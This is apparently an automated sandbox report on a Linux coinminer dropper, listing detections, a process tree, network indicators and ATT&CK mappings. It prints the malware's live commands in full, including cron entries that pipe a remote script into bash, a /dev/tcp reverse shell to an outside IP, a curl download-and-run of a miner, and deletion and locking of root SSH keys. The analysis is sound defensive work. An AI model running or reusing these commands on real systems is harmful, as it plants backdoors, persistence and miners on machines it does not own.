Linux Analysis Report
gif.elf

Overview

General Information

Sample name: gif.elf
Analysis ID: 1633056
MD5: 4711254a232e4cbd4d98deb46e757f1d
SHA1: 93664323281e82fe36a847f785d6805891d20e42
SHA256: 1ce1b7de294df5c603d080376caf27f5f09ac16ba1ace7356e23e43db75ed60c
Tags: elf, user-abuse_ch

Detection

Score: 68
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Drops invisible ELF files
Protects files from modification
Sample tries to persist itself using cron
Sample tries to set files in /etc globally writable
Terminates several processes with shell command 'killall'
Creates hidden files and/or directories
ELF contains segments with high entropy indicating compressed/encrypted content
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Reads the 'hosts' file potentially containing internal network hosts
Removes protection from files
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Writes shell script file to disk with an unusual file extension

Classification

[Classification chart. Categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Scale: clean, suspicious, malicious]
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1633056
Start date and time: 2025-03-09 17:27:17 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Sample name: gif.elf
Detection: MAL
Classification: mal68.troj.evad.linELF@0/7@4/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: w.softprojectcode.com
Command: /tmp/gif.elf
PID: 5473
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • gif.elf (PID: 5473, Parent: 5396, MD5: 4711254a232e4cbd4d98deb46e757f1d) Arguments: /tmp/gif.elf
    • gif.elf New Fork (PID: 5474, Parent: 5473)
      • gif.elf New Fork (PID: 5475, Parent: 5474)
        • gif.elf New Fork (PID: 5476, Parent: 5475)
        • sh (PID: 5476, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /root/.ssh"
          • sh New Fork (PID: 5477, Parent: 5476)
          • chattr (PID: 5477, Parent: 5476, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /root/.ssh
        • gif.elf New Fork (PID: 5478, Parent: 5475)
        • sh (PID: 5478, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /root/.ssh/authorized_keys2"
          • sh New Fork (PID: 5479, Parent: 5478)
          • rm (PID: 5479, Parent: 5478, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.ssh/authorized_keys2
        • gif.elf New Fork (PID: 5480, Parent: 5475)
        • sh (PID: 5480, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr +i /root/.ssh/authorized_keys2"
          • sh New Fork (PID: 5481, Parent: 5480)
          • chattr (PID: 5481, Parent: 5480, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr +i /root/.ssh/authorized_keys2
        • gif.elf New Fork (PID: 5482, Parent: 5475)
        • sh (PID: 5482, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /etc/cron.d > /dev/null 2>&1"
          • sh New Fork (PID: 5483, Parent: 5482)
          • chattr (PID: 5483, Parent: 5482, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /etc/cron.d
        • gif.elf New Fork (PID: 5484, Parent: 5475)
        • sh (PID: 5484, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /etc/crontab > /dev/null 2>&1"
          • sh New Fork (PID: 5485, Parent: 5484)
          • chattr (PID: 5485, Parent: 5484, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /etc/crontab
        • gif.elf New Fork (PID: 5486, Parent: 5475)
        • sh (PID: 5486, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /var/spool/cron > /dev/null 2>&1"
          • sh New Fork (PID: 5487, Parent: 5486)
          • chattr (PID: 5487, Parent: 5486, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /var/spool/cron
        • gif.elf New Fork (PID: 5488, Parent: 5475)
        • sh (PID: 5488, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /var/spool/cron/crontabs > /dev/null 2>&1"
          • sh New Fork (PID: 5489, Parent: 5488)
          • chattr (PID: 5489, Parent: 5488, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /var/spool/cron/crontabs
        • gif.elf New Fork (PID: 5490, Parent: 5475)
        • sh (PID: 5490, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /etc/cron.hourly > /dev/null 2>&1"
          • sh New Fork (PID: 5491, Parent: 5490)
          • chattr (PID: 5491, Parent: 5490, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /etc/cron.hourly
        • gif.elf New Fork (PID: 5492, Parent: 5475)
        • sh (PID: 5492, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo '0 1 * * * root curl -fs http://z.shavsl.com/b|bash ' > /etc/cron.d/watch"
        • gif.elf New Fork (PID: 5493, Parent: 5475)
        • sh (PID: 5493, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo '0 2 * * * root wget -c http://z.shavsl.com/b -qO -|bash ' >> /etc/cron.d/watch"
        • gif.elf New Fork (PID: 5494, Parent: 5475)
        • sh (PID: 5494, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr +i /etc/cron.d/watch > /dev/null 2>&1"
          • sh New Fork (PID: 5495, Parent: 5494)
          • chattr (PID: 5495, Parent: 5494, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr +i /etc/cron.d/watch
        • gif.elf New Fork (PID: 5496, Parent: 5475)
        • sh (PID: 5496, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo '#!/bin/bash' > /etc/cron.hourly/prelink"
        • gif.elf New Fork (PID: 5497, Parent: 5475)
        • sh (PID: 5497, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo 'bash -i >& /dev/tcp/45.125.66.31/8443 0>&1' >> /etc/cron.hourly/prelink"
        • gif.elf New Fork (PID: 5498, Parent: 5475)
        • sh (PID: 5498, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod 755 /etc/cron.hourly/prelink"
          • sh New Fork (PID: 5499, Parent: 5498)
          • chmod (PID: 5499, Parent: 5498, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 755 /etc/cron.hourly/prelink
        • gif.elf New Fork (PID: 5500, Parent: 5475)
        • sh (PID: 5500, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr +i /etc/cron.hourly/prelink > /dev/null 2>&1"
          • sh New Fork (PID: 5501, Parent: 5500)
          • chattr (PID: 5501, Parent: 5500, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr +i /etc/cron.hourly/prelink
        • gif.elf New Fork (PID: 5502, Parent: 5475)
        • sh (PID: 5502, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /root/.ssh"
          • sh New Fork (PID: 5503, Parent: 5502)
          • chattr (PID: 5503, Parent: 5502, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /root/.ssh
        • gif.elf New Fork (PID: 5504, Parent: 5475)
        • sh (PID: 5504, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /root/.ssh/authorized_keys"
          • sh New Fork (PID: 5505, Parent: 5504)
          • rm (PID: 5505, Parent: 5504, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.ssh/authorized_keys
        • gif.elf New Fork (PID: 5506, Parent: 5475)
        • sh (PID: 5506, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr +i /root/.ssh/authorized_keys"
          • sh New Fork (PID: 5507, Parent: 5506)
          • chattr (PID: 5507, Parent: 5506, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr +i /root/.ssh/authorized_keys
        • gif.elf New Fork (PID: 5508, Parent: 5475)
        • sh (PID: 5508, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia -R /root/.ssh"
          • sh New Fork (PID: 5509, Parent: 5508)
          • chattr (PID: 5509, Parent: 5508, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia -R /root/.ssh
        • gif.elf New Fork (PID: 5510, Parent: 5475)
        • sh (PID: 5510, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /root/.ssh/authorized_keys2"
          • sh New Fork (PID: 5511, Parent: 5510)
          • rm (PID: 5511, Parent: 5510, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.ssh/authorized_keys2
        • gif.elf New Fork (PID: 5512, Parent: 5475)
        • sh (PID: 5512, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr +i /root/.ssh/authorized_keys2"
          • sh New Fork (PID: 5513, Parent: 5512)
          • chattr (PID: 5513, Parent: 5512, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr +i /root/.ssh/authorized_keys2
        • gif.elf New Fork (PID: 5514, Parent: 5475)
        • sh (PID: 5514, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner && chmod 755 /tmp/.miner && /tmp/.miner"
          • sh New Fork (PID: 5515, Parent: 5514)
          • curl (PID: 5515, Parent: 5514, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner
        • gif.elf New Fork (PID: 5591, Parent: 5475)
        • sh (PID: 5591, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /tmp/python > /dev/null 2>&1 && rm -rf /tmp/python > /dev/null 2>&1"
          • sh New Fork (PID: 5592, Parent: 5591)
          • chattr (PID: 5592, Parent: 5591, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /tmp/python
        • gif.elf New Fork (PID: 5593, Parent: 5475)
        • sh (PID: 5593, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia chattr -ia /usr/bin/bsd-port/getty > /dev/null 2>&1 && rm -rf /usr/bin/bsd-port/getty > /dev/null 2>&1"
          • sh New Fork (PID: 5594, Parent: 5593)
          • chattr (PID: 5594, Parent: 5593, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia chattr -ia /usr/bin/bsd-port/getty
        • gif.elf New Fork (PID: 5595, Parent: 5475)
        • sh (PID: 5595, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /usr/bin/.sshd > /dev/null 2>&1 && rm -rf /usr/bin/.sshd > /dev/null 2>&1"
          • sh New Fork (PID: 5596, Parent: 5595)
          • chattr (PID: 5596, Parent: 5595, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /usr/bin/.sshd
        • gif.elf New Fork (PID: 5597, Parent: 5475)
        • sh (PID: 5597, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /etc/rc.d/init.d/selinux > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/selinux > /dev/null 2>&1"
          • sh New Fork (PID: 5598, Parent: 5597)
          • chattr (PID: 5598, Parent: 5597, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /etc/rc.d/init.d/selinux
        • gif.elf New Fork (PID: 5599, Parent: 5475)
        • sh (PID: 5599, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /etc/rc.d/init.d/DbSecuritySp > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/DbSecuritySpt > /dev/null 2>&1"
          • sh New Fork (PID: 5600, Parent: 5599)
          • chattr (PID: 5600, Parent: 5599, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /etc/rc.d/init.d/DbSecuritySp
        • gif.elf New Fork (PID: 5601, Parent: 5475)
        • sh (PID: 5601, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /usr/bin/sh.sh > /dev/null 2>&1 && rm -rf /usr/bin/sh.sh > /dev/null 2>&1"
          • sh New Fork (PID: 5602, Parent: 5601)
          • chattr (PID: 5602, Parent: 5601, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /usr/bin/sh.sh
        • gif.elf New Fork (PID: 5603, Parent: 5475)
        • sh (PID: 5603, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /etc/cron.hourly/cron.sh > /dev/null 2>&1 && rm -rf /etc/cron.hourly/cron.sh > /dev/null 2>&1"
          • sh New Fork (PID: 5604, Parent: 5603)
          • chattr (PID: 5604, Parent: 5603, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /etc/cron.hourly/cron.sh
        • gif.elf New Fork (PID: 5605, Parent: 5475)
        • sh (PID: 5605, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /lib/udev/udev /lib/udev/debug > /dev/null 2>&1 && rm -rf /lib/udev/udev /lib/udev/debug > /dev/null 2>&1"
          • sh New Fork (PID: 5606, Parent: 5605)
          • chattr (PID: 5606, Parent: 5605, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /lib/udev/udev /lib/udev/debug
        • gif.elf New Fork (PID: 5607, Parent: 5475)
        • sh (PID: 5607, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chattr -ia /usr/bin/xrig > /dev/null 2>&1 && rm -rf /usr/bin/xrig 1> /dev/null 2>&1"
          • sh New Fork (PID: 5608, Parent: 5607)
          • chattr (PID: 5608, Parent: 5607, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -ia /usr/bin/xrig
        • gif.elf New Fork (PID: 5609, Parent: 5475)
        • sh (PID: 5609, Parent: 5475, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "killall .sshd xrig getty > /dev/null 2>&1 "
          • sh New Fork (PID: 5610, Parent: 5609)
          • killall (PID: 5610, Parent: 5609, MD5: cd2adedbee501869ac691b88af39cd8b) Arguments: killall .sshd xrig getty
  • cleanup
No yara matches
No Suricata rule has matched

AV Detection

Source: gif.elf Virustotal: Detection: 9%
Source: gif.elf String: md5sum %s/usr/sbin/sestatus/usr/sbin/setenforcedisabled/etc/selinux/config/tmp/uninstall.shlsmod |grep -i AliSecGuard/root/.ssh/usr/bin/chattrrm -rf %schattr +i %s/etc/cron.d/var/spool/cron/crontabs/etc/cron.hourly/usr/include/%s/usr/include/usr/bin/curl/usr/bin/wget/usr/bin/cur/usr/bin/url/usr/bin/wge/usr/bin/get/usr/bin/cd1/usr/bin/cdt/usr/bin/wd1%cAliYunDunMonitorAliYunDunUpdateAliYunDungold%d.tar.gzgold%d-%d.tar.gz/usr/include/gold%d./install.sh/usr/bin/infocmpedanolis%d.tar.gzanolis%d-%d.tar.gz/usr/include/anolis%drocky%d.tar.gzrocky%d-%d.tar.gz/usr/include/rocky%dstream%d.tar.gzstream%d-%d.tar.gz/usr/include/stream%deuler%d.tar.gzeuler%d-%d.tar.gz/usr/include/euler%dredhatubuntudebian0.0.22version %s
Source: /usr/bin/curl (PID: 5515) Reads hosts file: /etc/hosts
Source: global traffic HTTP traffic detected: GET /miner HTTP/1.1 Host: w.softprojectcode.com User-Agent: curl/7.68.0 Accept: */*
Source: global traffic DNS traffic detected: DNS query: w.softprojectcode.com
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: gif.elf String found in binary or memory: http://w.softprojectcode.com/%s
Source: gif.elf String found in binary or memory: http://w.softprojectcode.com/miner
Source: gif.elf, watch.48.dr, watch.50.dr String found in binary or memory: http://z.shavsl.com/b
Source: classification engine Classification label: mal68.troj.evad.linELF@0/7@4/0

Persistence and Installation Behavior

Source: /bin/sh (PID: 5481) Args: chattr +i /root/.ssh/authorized_keys2
Source: /bin/sh (PID: 5495) Args: chattr +i /etc/cron.d/watch
Source: /bin/sh (PID: 5501) Args: chattr +i /etc/cron.hourly/prelink
Source: /bin/sh (PID: 5507) Args: chattr +i /root/.ssh/authorized_keys
Source: /bin/sh (PID: 5513) Args: chattr +i /root/.ssh/authorized_keys2
Source: /bin/sh (PID: 5492) File: /etc/cron.d/watch
Source: /bin/sh (PID: 5493) File: /etc/cron.d/watch
Source: /bin/sh (PID: 5496) File: /etc/cron.hourly/prelink
Source: /bin/sh (PID: 5497) File: /etc/cron.hourly/prelink
Source: /usr/bin/chmod (PID: 5499) File: /etc/cron.hourly/prelink (bits: - usr: rx grp: rx all: rwx)
Source: /bin/sh (PID: 5610) Killall command executed: killall .sshd xrig getty
Source: /tmp/gif.elf (PID: 5475) Directory: /root/.ssh
Source: /usr/bin/chattr (PID: 5477) Directory: /root/.ssh
Source: /usr/bin/chattr (PID: 5483) Directory: /etc/cron.d/.placeholder
Source: /usr/bin/chattr (PID: 5487) Directory: /var/spool/cron/atjobs/.SEQ
Source: /usr/bin/chattr (PID: 5491) Directory: /etc/cron.hourly/.placeholder
Source: /usr/bin/chattr (PID: 5503) Directory: /root/.ssh
Source: /usr/bin/chattr (PID: 5509) Directory: /root/.ssh
Source: /usr/bin/curl (PID: 5515) Directory: /root/.curlrc
Source: /usr/bin/curl (PID: 5515) File: /tmp/.miner
Source: /tmp/gif.elf (PID: 5476) Shell command executed: sh -c "chattr -ia -R /root/.ssh"
Source: /tmp/gif.elf (PID: 5478) Shell command executed: sh -c "rm -rf /root/.ssh/authorized_keys2"
Source: /tmp/gif.elf (PID: 5480) Shell command executed: sh -c "chattr +i /root/.ssh/authorized_keys2"
Source: /tmp/gif.elf (PID: 5482) Shell command executed: sh -c "chattr -ia -R /etc/cron.d > /dev/null 2>&1"
Source: /tmp/gif.elf (PID: 5484) Shell command executed: sh -c "chattr -ia /etc/crontab > /dev/null 2>&1"
Source: /tmp/gif.elf (PID: 5486) Shell command executed: sh -c "chattr -ia -R /var/spool/cron > /dev/null 2>&1"
Source: /tmp/gif.elf (PID: 5488) Shell command executed: sh -c "chattr -ia -R /var/spool/cron/crontabs > /dev/null 2>&1"
Source: /tmp/gif.elf (PID: 5490) Shell command executed: sh -c "chattr -ia -R /etc/cron.hourly > /dev/null 2>&1"
Source: /tmp/gif.elf (PID: 5492) Shell command executed: sh -c "echo '0 1 * * * root curl -fs http://z.shavsl.com/b|bash ' > /etc/cron.d/watch"
Source: /tmp/gif.elf (PID: 5493) Shell command executed: sh -c "echo '0 2 * * * root wget -c http://z.shavsl.com/b -qO -|bash ' >> /etc/cron.d/watch"
Source: /tmp/gif.elf (PID: 5494) Shell command executed: sh -c "chattr +i /etc/cron.d/watch > /dev/null 2>&1"
Source: /tmp/gif.elf (PID: 5496) Shell command executed: sh -c "echo '#!/bin/bash' > /etc/cron.hourly/prelink"
Source: /tmp/gif.elf (PID: 5497) Shell command executed: sh -c "echo 'bash -i >& /dev/tcp/45.125.66.31/8443 0>&1' >> /etc/cron.hourly/prelink"
Source: /tmp/gif.elf (PID: 5498) Shell command executed: sh -c "chmod 755 /etc/cron.hourly/prelink"
Source: /tmp/gif.elf (PID: 5500) Shell command executed: sh -c "chattr +i /etc/cron.hourly/prelink > /dev/null 2>&1"
Source: /tmp/gif.elf (PID: 5502) Shell command executed: sh -c "chattr -ia -R /root/.ssh"
Source: /tmp/gif.elf (PID: 5504) Shell command executed: sh -c "rm -rf /root/.ssh/authorized_keys"
Source: /tmp/gif.elf (PID: 5506) Shell command executed: sh -c "chattr +i /root/.ssh/authorized_keys"
Source: /tmp/gif.elf (PID: 5508) Shell command executed: sh -c "chattr -ia -R /root/.ssh"
Source: /tmp/gif.elf (PID: 5510) Shell command executed: sh -c "rm -rf /root/.ssh/authorized_keys2"
Source: /tmp/gif.elf (PID: 5512) Shell command executed: sh -c "chattr +i /root/.ssh/authorized_keys2"
Source: /tmp/gif.elf (PID: 5514) Shell command executed: sh -c "curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner && chmod 755 /tmp/.miner && /tmp/.miner"
Source: /tmp/gif.elf (PID: 5591) Shell command executed: sh -c "chattr -ia /tmp/python > /dev/null 2>&1 && rm -rf /tmp/python > /dev/null 2>&1"
Source: /tmp/gif.elf (PID: 5593) Shell command executed: sh -c "chattr -ia chattr -ia /usr/bin/bsd-port/getty > /dev/null 2>&1 && rm -rf /usr/bin/bsd-port/getty > /dev/null 2>&1"
Source: /tmp/gif.elf (PID: 5595) Shell command executed: sh -c "chattr -ia /usr/bin/.sshd > /dev/null 2>&1 && rm -rf /usr/bin/.sshd > /dev/null 2>&1"
Source: /tmp/gif.elf (PID: 5597) Shell command executed: sh -c "chattr -ia /etc/rc.d/init.d/selinux > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/selinux > /dev/null 2>&1"
Source: /tmp/gif.elf (PID: 5599) Shell command executed: sh -c "chattr -ia /etc/rc.d/init.d/DbSecuritySp > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/DbSecuritySpt > /dev/null 2>&1"
Source: /tmp/gif.elf (PID: 5601) Shell command executed: sh -c "chattr -ia /usr/bin/sh.sh > /dev/null 2>&1 && rm -rf /usr/bin/sh.sh > /dev/null 2>&1"
Source: /tmp/gif.elf (PID: 5603) Shell command executed: sh -c "chattr -ia /etc/cron.hourly/cron.sh > /dev/null 2>&1 && rm -rf /etc/cron.hourly/cron.sh > /dev/null 2>&1"
Source: /tmp/gif.elf (PID: 5605) Shell command executed: sh -c "chattr -ia /lib/udev/udev /lib/udev/debug > /dev/null 2>&1 && rm -rf /lib/udev/udev /lib/udev/debug > /dev/null 2>&1"
Source: /tmp/gif.elf (PID: 5607) Shell command executed: sh -c "chattr -ia /usr/bin/xrig > /dev/null 2>&1 && rm -rf /usr/bin/xrig 1> /dev/null 2>&1"
Source: /tmp/gif.elf (PID: 5609) Shell command executed: sh -c "killall .sshd xrig getty > /dev/null 2>&1 "
Source: /bin/sh (PID: 5499) Chmod executable: /usr/bin/chmod -> chmod 755 /etc/cron.hourly/prelink
Source: /bin/sh (PID: 5515) Curl executable: /usr/bin/curl -> curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner
Source: /bin/sh (PID: 5479) Rm executable: /usr/bin/rm -> rm -rf /root/.ssh/authorized_keys2
Source: /bin/sh (PID: 5505) Rm executable: /usr/bin/rm -> rm -rf /root/.ssh/authorized_keys
Source: /bin/sh (PID: 5511) Rm executable: /usr/bin/rm -> rm -rf /root/.ssh/authorized_keys2
Source: /usr/bin/curl (PID: 5515) File written: /tmp/.miner
Source: /bin/sh (PID: 5492) Crontab like entry written: /etc/cron.d/watch
Source: /bin/sh (PID: 5493) Crontab like entry written: /etc/cron.d/watch
Source: /bin/sh (PID: 5496) Writes shell script file to disk with an unusual file extension: /etc/cron.hourly/prelink

Hooking and other Techniques for Hiding and Protection

Source: /usr/bin/curl (PID: 5515) ELF file: /tmp/.miner
Source: .miner.94.dr Dropped file: segment LOAD with 7.9983 entropy (max. 8.0)
Source: /usr/bin/curl (PID: 5515) Queries kernel information via 'uname'
Source: /bin/sh (PID: 5477) Args: chattr -ia -R /root/.ssh
Source: /bin/sh (PID: 5483) Args: chattr -ia -R /etc/cron.d
Source: /bin/sh (PID: 5485) Args: chattr -ia /etc/crontab
Source: /bin/sh (PID: 5487) Args: chattr -ia -R /var/spool/cron
Source: /bin/sh (PID: 5489) Args: chattr -ia -R /var/spool/cron/crontabs
Source: /bin/sh (PID: 5491) Args: chattr -ia -R /etc/cron.hourly
Source: /bin/sh (PID: 5503) Args: chattr -ia -R /root/.ssh
Source: /bin/sh (PID: 5509) Args: chattr -ia -R /root/.ssh
Source: /bin/sh (PID: 5592) Args: chattr -ia /tmp/python
Source: /bin/sh (PID: 5594) Args: chattr -ia chattr -ia /usr/bin/bsd-port/getty
Source: /bin/sh (PID: 5596) Args: chattr -ia /usr/bin/.sshd
Source: /bin/sh (PID: 5598) Args: chattr -ia /etc/rc.d/init.d/selinux
Source: /bin/sh (PID: 5600) Args: chattr -ia /etc/rc.d/init.d/DbSecuritySp
Source: /bin/sh (PID: 5602) Args: chattr -ia /usr/bin/sh.sh
Source: /bin/sh (PID: 5604) Args: chattr -ia /etc/cron.hourly/cron.sh
Source: /bin/sh (PID: 5606) Args: chattr -ia /lib/udev/udev /lib/udev/debug
Source: /bin/sh (PID: 5608) Args: chattr -ia /usr/bin/xrig
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 2 Scripting | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 13 File and Directory Permissions Modification | 1 OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Ingress Tool Transfer | 1 Exfiltration Over Alternative Protocol | 1 Data Manipulation
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Scripting | Boot or Logon Initialization Scripts | 11 Hidden Files and Directories | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 File Deletion | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
No configs have been found
[Behavior graph: ID 1633056, Sample: gif.elf, Startdate: 09/03/2025, Architecture: LINUX, Score: 68]
Source | Detection | Scanner | Label
gif.elf | 10% | Virustotal |
gif.elf | 8% | ReversingLabs | Linux.Coinminer.Generic
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://z.shavsl.com/b | 0% | Avira URL Cloud | safe
http://w.softprojectcode.com/%s | 0% | Avira URL Cloud | safe
http://w.softprojectcode.com/miner | 0% | Avira URL Cloud | safe


Name | IP | Active | Malicious | Antivirus Detection | Reputation
daisy.ubuntu.com | 162.213.35.25 | true | false | | high
w.softprojectcode.com | 192.186.12.50 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://w.softprojectcode.com/miner | false | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://z.shavsl.com/b | gif.elf, watch.48.dr, watch.50.dr | false | Avira URL Cloud: safe | unknown
http://w.softprojectcode.com/%s | gif.elf | false | Avira URL Cloud: safe | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
192.186.12.50 | w.softprojectcode.com | United States | 395776 | FEDERAL-ONLINE-GROUP-LLCUS | false
      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
daisy.ubuntu.com | .i.elf | malicious | Unknown | 162.213.35.25
daisy.ubuntu.com | apep.arm.elf | malicious | Unknown | 162.213.35.24
daisy.ubuntu.com | jaws.elf | malicious | Unknown | 162.213.35.25
daisy.ubuntu.com | SecuriteInfo.com.Linux.Siggen.9999.21334.3171.elf | malicious | Unknown | 162.213.35.24
daisy.ubuntu.com | SecuriteInfo.com.Linux.Siggen.9999.31985.32179.elf | malicious | Unknown | 162.213.35.24
daisy.ubuntu.com | apep.arm5.elf | malicious | Unknown | 162.213.35.24
daisy.ubuntu.com | SecuriteInfo.com.Linux.Siggen.9999.9757.27365.elf | malicious | Unknown | 162.213.35.25
daisy.ubuntu.com | apep.mpsl.elf | malicious | Unknown | 162.213.35.24
daisy.ubuntu.com | apep.arm6.elf | malicious | Unknown | 162.213.35.24
w.softprojectcode.com | gif.elf | malicious | Xmrig | 107.167.34.74

Match | Associated Sample Name / URL | Detection | Threat Name | Context
FEDERAL-ONLINE-GROUP-LLCUS | nabmpsl.elf | malicious | Unknown | 192.250.200.80
FEDERAL-ONLINE-GROUP-LLCUS | ydJaT4b5N8.exe | malicious | FormBook | 192.186.57.30
